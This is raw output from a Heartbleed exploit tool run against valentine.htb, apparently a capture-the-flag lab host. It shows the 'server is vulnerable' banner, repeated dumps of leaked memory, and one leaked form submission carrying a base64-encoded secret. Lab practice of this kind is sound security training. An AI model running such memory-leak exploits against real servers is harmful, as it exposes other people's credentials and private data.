
defribulator v1.16
A tool to test and exploit the TLS heartbeat vulnerability aka heartbleed (CVE-2014-0160)

##################################################################
Connecting to: valentine.htb:443, 100 times
Sending Client Hello for TLSv1.0
Received Server Hello for TLSv1.0

WARNING: valentine.htb:443 returned more data than it should - server is vulnerable!
Please wait... connection attempt 1 of 100Please wait... connection attempt 2 of 100Please wait... connection attempt 3 of 100Please wait... connection attempt 4 of 100Please wait... connection attempt 5 of 100Please wait... connection attempt 6 of 100Please wait... connection attempt 7 of 100Please wait... connection attempt 8 of 100Please wait... connection attempt 9 of 100Please wait... connection attempt 10 of 100Please wait... connection attempt 11 of 100Please wait... connection attempt 12 of 100Please wait... connection attempt 13 of 100Please wait... connection attempt 14 of 100Please wait... connection attempt 15 of 100Please wait... connection attempt 16 of 100Please wait... connection attempt 17 of 100Please wait... connection attempt 18 of 100Please wait... connection attempt 19 of 100Please wait... connection attempt 20 of 100Please wait... connection attempt 21 of 100Please wait... connection attempt 22 of 100Please wait... connection attempt 23 of 100Please wait... connection attempt 24 of 100Please wait... connection attempt 25 of 100Please wait... connection attempt 26 of 100Please wait... connection attempt 27 of 100Please wait... connection attempt 28 of 100Please wait... connection attempt 29 of 100Please wait... connection attempt 30 of 100Please wait... connection attempt 31 of 100Please wait... connection attempt 32 of 100Please wait... connection attempt 33 of 100Please wait... connection attempt 34 of 100Please wait... connection attempt 35 of 100Please wait... connection attempt 36 of 100Please wait... connection attempt 37 of 100Please wait... connection attempt 38 of 100Please wait... connection attempt 39 of 100Please wait... connection attempt 40 of 100Please wait... connection attempt 41 of 100Please wait... connection attempt 42 of 100Please wait... connection attempt 43 of 100Please wait... connection attempt 44 of 100Please wait... connection attempt 45 of 100Please wait... connection attempt 46 of 100Please wait... connection attempt 47 of 100Please wait... connection attempt 48 of 100Please wait... connection attempt 49 of 100Please wait... connection attempt 50 of 100Please wait... connection attempt 51 of 100Please wait... connection attempt 52 of 100Please wait... connection attempt 53 of 100Please wait... connection attempt 54 of 100Please wait... connection attempt 55 of 100Please wait... connection attempt 56 of 100Please wait... connection attempt 57 of 100Please wait... connection attempt 58 of 100Please wait... connection attempt 59 of 100Please wait... connection attempt 60 of 100Please wait... connection attempt 61 of 100Please wait... connection attempt 62 of 100Please wait... connection attempt 63 of 100Please wait... connection attempt 64 of 100Please wait... connection attempt 65 of 100Please wait... connection attempt 66 of 100Please wait... connection attempt 67 of 100Please wait... connection attempt 68 of 100Please wait... connection attempt 69 of 100Please wait... connection attempt 70 of 100Please wait... connection attempt 71 of 100Please wait... connection attempt 72 of 100Please wait... connection attempt 73 of 100Please wait... connection attempt 74 of 100Please wait... connection attempt 75 of 100Please wait... connection attempt 76 of 100Please wait... connection attempt 77 of 100Please wait... connection attempt 78 of 100Please wait... connection attempt 79 of 100Please wait... connection attempt 80 of 100Please wait... connection attempt 81 of 100Please wait... connection attempt 82 of 100Please wait... connection attempt 83 of 100Please wait... connection attempt 84 of 100Please wait... connection attempt 85 of 100Please wait... connection attempt 86 of 100Please wait... connection attempt 87 of 100Please wait... connection attempt 88 of 100Please wait... connection attempt 89 of 100Please wait... connection attempt 90 of 100Please wait... connection attempt 91 of 100Please wait... connection attempt 92 of 100Please wait... connection attempt 93 of 100Please wait... connection attempt 94 of 100Please wait... connection attempt 95 of 100Please wait... connection attempt 96 of 100Please wait... connection attempt 97 of 100Please wait... connection attempt 98 of 100Please wait... connection attempt 99 of 100Please wait... connection attempt 100 of 100
##################################################################

.@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#.@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#$.@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#.@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#$.@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#.@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#.@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#.@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#$.@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#.@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#$.@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#$.@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#$.@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#$.@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#$.@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#$.@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#$.@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#$.@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#$.@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#$.@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#$.@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#$.@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#$.@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#$.@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#$.@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#$.@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#$.@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#$.@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#$.@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#$.@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#$.@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#$.@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#$.@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#$.@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#$.@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#$.@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#$.@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#$.@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#$.@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#$.@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#$.@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#$.@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#$.@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#$.@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#$.@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#$.@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#$.@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#$.@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#$.@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#$.@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#$.@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#$.@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#$.@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#$.@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#$.@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#$.@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#$.@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#..............;.............................#....."..&..)Z........j.)8..\...".L~2y._8/6.@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#..............;.............................#....."..&..)Z........j.)8..\...".L~2y._8/6.@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#$.@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#$.@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#$.@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#$.@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#$.@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#$.@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#$.@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#$.@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#$.@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#$.@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#$.@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#..............;.............................#....."..&..)Z...R...L...-&....VI{.k .(5c.,$.@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#$.@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#$.@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#$.@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#$.@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#$.@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#$.@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#..............;.............................#....."..&..)Z...P....3ns.m.M9...-[.....{N..e$.@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#$.@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#$.@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#$.@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#$.@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#$.@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#$.@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#$.@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#.......0.0.1/decode.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 42

$text=aGVhcnRibGVlZGJlbGlldmV0aGVoeXBlCg==......P....BJ..{,f.B$.@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#$.@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#$.@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#$.@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#$.@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#$.@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#$.@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#$.@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#$.@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#$.@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#$.@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#$.@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#$.@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#$.@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#$.@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#$

